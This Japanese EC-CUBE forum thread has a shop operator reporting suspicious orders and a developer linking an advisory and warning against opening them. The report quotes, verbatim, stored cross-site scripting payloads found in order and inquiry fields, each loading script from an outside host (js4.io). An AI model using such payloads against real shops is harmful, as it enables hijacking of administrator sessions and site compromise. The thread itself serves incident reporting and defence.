バージョン選択

フォーラム

メニュー

オンライン状況

53 人のユーザが現在オンラインです。 (45 人のユーザが フォーラム を参照しています。)
登録ユーザ: 1
ゲスト: 52
amiclubwea もっと...

サイト内検索

質問 > その他 > 不審な受注について

その他

新規スレッドを追加する

スレッド表示 | 古いものから 前のトピック | 次のトピック | 下へ
投稿者 スレッド
nanasess
投稿日時: 2021/6/4 16:52
対応状況: −−−
登録日: 2006/9/9
居住地:
投稿: 2313
Re: 不審な受注について
現時点で EC-CUBE3系に影響があることは確認されていませんが、独自カスタマイズやプラグインなどにより、影響を受ける場合があります。

過信は禁物ですので、くれぐれも開かないようお願い致します。
hibiki1632
投稿日時: 2021/6/4 16:00
対応状況: −−−
新米
登録日: 2021/6/4
居住地:
投稿: 3
Re: 不審な受注について
情報ありがとうございます。
リンク先には「今回の脆弱性に関しましては、EC-CUBE4系をお使いの方対象でございます。」との記述がありましたが、EC-CUBE3系においても影響があるのでしょうか?

アドバイス通り、今後不審な受注が来た場合はなるべく開かないようにいたします。
nanasess
投稿日時: 2021/6/4 15:47
対応状況: −−−
登録日: 2006/9/9
居住地:
投稿: 2313
Re: 不審な受注について
こちらと同様の攻撃だと思われます。
https://www.ec-cube.net/news/detail.php?news_id=383

該当の注文は開かないことをおすすめします。
hibiki1632
投稿日時: 2021/6/4 15:38
対応状況: −−−
新米
登録日: 2021/6/4
居住地:
投稿: 3
不審な受注について
こんにちは。EC-CUBE3を用いてショップサイトを運営しております。
最近、不審な受注が入るようになりました。
住所欄や会社名欄に
"><sCRiPt sRC=//js4.io></sCrIpT>
という記述があります。

また、お問い合わせ欄には
プライバシーパッケージ</tExtArEa>'"><img src onerror=s=createElement('script');body.appendChild(s);s.src='//js4.io' style='display:none'>
という記述がされています。

現状、これといった被害は確認しておりませんが、不気味なので情報を求めています。
同様の現象をご存じの方、もしくは、記述されているのがどういった意味のコードなのかご存じの方がいらっしゃいましたら、ご教授いただければ幸いです。


▼テンプレート
[EC-CUBE] 3.0.16
[レンタルサーバ] Xserver
[OS] Linux sv822.xserver.jp 4.4.0-197-generic #229-Ubuntu SMP Wed Nov 25 11:05:42 UTC 2020 x86_64
[PHP] PHP7.2.34
[データベース] MySQL 5.7.27
[WEBサーバ] Apache
[ブラウザ] Google Chrome
スレッド表示 | 古いものから 前のトピック | 次のトピック | トップ


 



ログイン


EC-CUBE公式 Amazon Payプラグイン

統計情報

総メンバー数は88,718名です
総投稿数は109,952件です

投稿数ランキング

1
seasoft
7367
2
468
3217
3
AMUAMU
2712
4
nanasess
2313
5
umebius
2085
6
yuh
1819
7
h_tanaka
1638
8
red
1570
9
mcontact
1285
10
tsuji
958
11
fukap
907
12
shutta
835
13
tao_s
799
14 ramrun 789
15 karin 689
16 sumida 641
17
homan
633
18 DELIGHT 572
19
patapata
502
20
flealog
485


ネットショップの壺

EC-CUBEインテグレートパートナー

Copyright© EC-CUBE CO.,LTD. All Rights Reserved.